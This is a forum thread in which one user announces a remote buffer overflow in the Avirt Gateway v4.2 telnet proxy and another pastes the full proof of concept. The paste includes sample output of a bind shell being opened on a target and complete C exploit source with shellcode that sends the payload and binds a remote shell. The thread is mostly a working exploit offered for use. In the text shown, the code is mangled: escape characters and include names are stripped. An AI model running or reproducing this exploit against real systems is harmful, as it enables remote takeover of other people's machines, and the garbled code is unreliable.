Results 1 to 2 of 2

Thread: Avirt Gateway v4.2-proof of concept

  1. #1

    Wink Avirt Gateway v4.2-proof of concept

    The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a String of about 510bytes at the „Ready>“ prompt will overwrite EIP.
    Exploit will bind a shell to a specified port on the attacked host.

    Read proof of concept at www.xatrix.org

  2. #2
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation

    And for those who couldnt bother clicking the link...


    Avirt Gateway 4.2 remote buffer overflow: proof of concept

    The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a String of about 510bytes at the „Ready>“ prompt will overwrite EIP.
    Exploit will bind a shell to a specified port on the attacked host.



    Example:
    bash-2.05$ agate 10.0.0.1 7007


    Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)


    initialising socket
    ...initialized
    trying to connect
    ...connected
    (waiting)
    sending exploit
    ...sent
    (waiting)
    ...closed
    shell bound to port 7007
    bash-2.05$ nc -v target 7007
    target [10.0.0.1] 7007 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.


    C:>



    Exploit:
    ----------------------------------------------------------------------------cut--------------------------- --------------------------------------------------------
    /* agate.c by uid0x00
    * Avirt Gateway 4.2 remote exploit
    * compile with gcc agate.c -o agate
    *
    * tested with win2k, sp2
    *
    * thx to ByteRage, exploit is based on his shellcode
    */


    /* Set the following three defines according to the DLL we use */


    // MSVCRT.DLL version 6.10.8924.0 (win2K)
    #define LoadLibraryRefNEG "x30xCFxFCx87"
    #define GetProcAddressRefADD "xFC"
    #define newEIP "x60x32xFAx74" // Should JMP/CALL EBX


    #include
    #include
    #include
    #include
    #include


    int main(int argc, char *argv[]) {
    int s;
    struct sockaddr_in SockAdr;
    char exploit[1024];
    unsigned short int a_port;


    char shellcode[] =


    /* ==== SHELLC0DE START ==== */
    /* shellcode based on ByteRage's 450byte code (thx for your help man!) */
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xEBx06x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90xEBx06x90x90"newEIP"x90x90x90x90x90x90x90x90x90xE8xFFxFFxFFxFF"
    "xC0x5ExACx84xC0x75xFBx8BxFEx33xC9xB1xC1x4Ex80x36x99xE2xFAxBB"LoadLibraryRefNEG
    "xF7xDBx56xFFx13x95xACx84xC0x75xFBx56x55xFFx53"GetProcAddressRefADD"xABxAC"
    "x84xC0x75xFBxACx3Cx21x74xE7x72x03x4ExEBxEBx33xEDx55x6Ax01x6Ax02xFF"
    "x57xE8x93x6Ax10x56x53xFFx57xECx6Ax02x53xFFx57xF0x33xC0x57x50xB0x0C"
    "xABx58xABx40xABx5Fx55x57x56xADx56xFFx57xC0x55x57xADx56xADx56xFFx57"
    "xC0xB0x44x89x07x57xFFx57xC4x8Bx46xF4x89x47x3Cx89x47x40xADx89x47x38"
    "x33xC0x89x47x30x66xB8x01x01x89x47x2Cx57x57x55x55x55x6Ax01x55x55x56"
    "x55xFFx57xC8xFFx76xF0xFFx57xCCxFFx76xFCxFFx57xCCx55x55x53xFFx57xF4"
    "x93x33xC0xB4x04x50x6Ax40xFFx57xD4x96x6Ax50xFFx57xE0x8BxCDxB5x04x55"
    "x55x57x51x56xFFx77xAFxFFx57xD0x8Bx0FxE3x18x55x57x51x56xFFx77xAFxFF"
    "x57xDCx0BxC0x74x21x55xFFx37x56x53xFFx57xF8xEBxD0x33xC0x50xB4x04x50"
    "x56x53xFFx57xFCx55x57x50x56xFFx77xB3xFFx57xD8xEBxB9xFFx57xE4xD2xDC"
    "xCBxD7xDCxD5xAAxABx99xDAxEBxFCxF8xEDxFCxC9xF0xE9xFCx99xDExFCxEDxCA"
    "xEDxF8xEBxEDxECxE9xD0xF7xFFxF6xD8x99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFA"
    "xFCxEAxEAxD8x99xDAxF5xF6xEAxFCxD1xF8xF7xFDxF5xFCx99xC9xFCxFCxF2xD7"
    "xF8xF4xFCxFDxC9xF0xE9xFCx99xDExF5xF6xFBxF8xF5xD8xF5xF5xF6xFAx99xCE"
    "xEBxF0xEDxFCxDFxF0xF5xFCx99xCBxFCxF8xFDxDFxF0xF5xFCx99xCAxF5xFCxFC"
    "xE9x99xDCxE1xF0xEDxC9xEBxF6xFAxFCxEAxEAx99xB8xCExCAxD6xDAxD2xAAxAB"
    "x99xEAxF6xFAxF2xFCxEDx99xFBxF0xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFA"
    "xFAxFCxE9xEDx99xEAxFCxF7xFDx99xEBxFCxFAxEFx99x99x9Bx99x82xA1x99x99"
    "x99x99x99x99x99x99x99x99x99x99xFAxF4xFDx99x0Dx0A";


    /* ==== SHELLC0DE ENDS ==== */


    printf("nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)nn");


    if(argc n", argv[0]);
    return 0;
    }


    //insert shell port
    a_port = htons(atoi(argv[2]));
    a_port^= 0x9999;
    shellcode[964] = (a_port) & 0xff;
    shellcode[965] = (a_port >> 8) & 0xff;


    //init the exploit buffer
    memset(&exploit, 'xCC', 0x200);
    memcpy(&exploit, &shellcode, sizeof(shellcode)-1);


    printf("initialising socketn");
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (s) {
    printf("...initializedn");


    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(23);


    printf("trying to connectn");
    if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
    printf("...connectedn");
    printf("(waiting)n");
    sleep(3);


    printf("sending exploitn");
    send(s, exploit, sizeof(exploit), 0);
    printf("...sentn");


    printf("(waiting)n");
    sleep(3);


    printf("...closednshell bound to port %s n", argv[2]);
    close(s);
    }
    else {
    printf("... failed errno = %in", errno);
    close(s);
    return(0);
    }
    }
    }
    ----------------------------------------------------------------------------cut--------------------------- --------------------------------------------------------

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •